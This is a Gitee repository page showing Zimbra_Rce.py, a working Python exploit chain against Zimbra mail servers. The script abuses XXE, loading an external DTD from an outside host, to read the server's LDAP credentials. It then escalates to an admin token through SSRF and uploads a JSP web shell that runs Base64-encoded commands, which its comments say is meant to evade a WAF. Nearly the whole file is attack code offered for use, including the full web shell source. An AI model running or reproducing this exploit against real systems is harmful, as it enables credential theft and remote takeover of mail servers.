登录 注册
开源 企业版 高校版 私有云 Gitee AI NEW
扫描微信二维码支付
取消
支付完成
Watch
不关注 关注所有动态 仅关注版本发行动态 关注但不提醒动态
1 Star 0 Fork 133

Gavin / K8tools

forked from bxqtee / K8tools 
代码 Issues 0 Pull Requests 0 Wiki 统计 流水线
服务
加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
项目仓库所选许可证以仓库主分支所使用许可证为准
克隆/下载
Zimbra_Rce.py 4.34 KB
一键复制 编辑 原始数据 按行查看 历史
k8gege 提交于 2019-05-06 22:49 . Zimbra XXE RCE GetShell Exploit
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107
#coding=utf8

import requests

import sys

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

base_url=sys.argv[1]

base_url=base_url.rstrip("/")

#upload file name and content

#modify by k8gege

#Connect "shell.jsp" using K8fly CmdShell

#Because the CMD parameter is encrypted using Base64(bypass WAF)

filename = "shell.jsp"

fileContent = r'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>'

print(base_url)

#dtd file url

dtd_url="https://k8gege.github.io/zimbra.dtd"

"""

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">

<!ENTITY % start "<![CDATA[">

<!ENTITY % end "]]>">

<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

"""

xxe_data = r"""<!DOCTYPE Autodiscover [

        <!ENTITY % dtd SYSTEM "{dtd}">

        %dtd;

        %all;

        ]>

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">

    <Request>

        <EMailAddress>aaaaa</EMailAddress>

        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>

    </Request>

</Autodiscover>""".format(dtd=dtd_url)



#XXE stage

headers = {

    "Content-Type":"application/xml"

}

print("[*] Get User Name/Password By XXE ")

r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15)

#print r.text

if 'response schema not available' not in r.text:

    print("have no xxe")

    exit()



#low_token Stage

import re

pattern_name = re.compile(r"&lt;key name=(\"|&quot;)zimbra_user(\"|&quot;)&gt;\n.*?&lt;value&gt;(.*?)&lt;\/value&gt;")

pattern_password = re.compile(r"&lt;key name=(\"|&quot;)zimbra_ldap_password(\"|&quot;)&gt;\n.*?&lt;value&gt;(.*?)&lt;\/value&gt;")

username = pattern_name.findall(r.text)[0][2]

password = pattern_password.findall(r.text)[0][2]

print(username)

print(password)



auth_body="""<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">

   <soap:Header>

       <context xmlns="urn:zimbra">

           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>

       </context>

   </soap:Header>

   <soap:Body>

     <AuthRequest xmlns="{xmlns}">

        <account by="adminName">{username}</account>

        <password>{password}</password>

     </AuthRequest>

   </soap:Body>

</soap:Envelope>

"""

print("[*] Get Low Privilege Auth Token")

r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False)



pattern_auth_token=re.compile(r"<authToken>(.*?)</authToken>")



low_priv_token = pattern_auth_token.findall(r.text)[0]



#print(low_priv_token)



# SSRF+Get Admin_Token Stage



headers["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";"

headers["Host"]="foo:7071"

print("[*] Get Admin  Auth Token By SSRF")

r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password),headers=headers,verify=False)



admin_token =pattern_auth_token.findall(r.text)[0]

#print("ADMIN_TOKEN:"+admin_token)



f = {

    'filename1':(None,"whocare",None),

    'clientFile':(filename,fileContent,"text/plain"),

    'requestId':(None,"12",None),

}



headers ={

    "Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";"

}

print("[*] Uploading file")

r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False)

#print(r.text)

print("Shell: "+base_url+"/downloads/"+filename)

#print("Connect \"shell.jsp\" using K8fly CmdShell\nBecause the CMD parameter is encrypted using Base64(bypass WAF)")

print("[*] Request Result:")

s = requests.session()

r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers)

#print(r.text)

print("May need cookie:")

print(headers['Cookie'])
PowerShell
1
https://gitee.com/gavin-chan/K8tools.git
git@gitee.com:gavin-chan/K8tools.git
gavin-chan
K8tools
K8tools
master
点此查找更多帮助

搜索帮助

Git 命令在线学习 如何在 Gitee 导入 GitHub 仓库
Git 仓库基础操作
企业版和社区版功能对比
SSH 公钥设置
如何处理代码冲突
仓库体积过大,如何减小?
如何找回被删除的仓库数据
Gitee 产品配额说明
GitHub仓库快速导入Gitee及同步更新
什么是 Release(发行版)
将 PHP 项目自动发布到 packagist.org
评论
仓库举报
回到顶部